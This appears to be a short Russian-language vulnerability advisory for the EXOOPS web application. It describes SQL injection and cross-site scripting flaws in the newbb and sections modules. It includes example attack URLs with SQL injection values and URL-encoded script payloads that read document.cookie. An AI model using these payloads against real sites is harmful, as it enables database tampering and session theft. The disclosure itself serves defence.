Программа: EXOOPS

Уязвимость позволяет удаленному
пользователю произвести XSS нападение и
выполнить произвольные SQL команды в базе
данных уязвимого приложения. Уязвимость
существует в нескольких сценариях при
обработке входных данных. Удаленный
пользователь может с помощью специально
сформированного URL выполнить произвольные
SQL команды в базе данных приложения.

Пример:

http://[target]/modules/newbb/index.php? viewcat=’SQL_INJECTION
http://[target]/modules/sections/index.php? op=viewarticle&artid=9%2c+9%2c+9

Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольные HTML сценарий в браузере жертвы
в контексте безопасности уязвимого сайта.

Пример:

http://[target]/modules/newbb/viewforum.php?sortname=p.post_time &sortorder=ASC&sortdays=%22%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E&forum=25&refresh=Vai
http://[target]/modules/newbb/index.php?viewcat=%22 %3E%3Cscript%3Ealert(document.cookie)
%3C/script%3E



Оставить мнение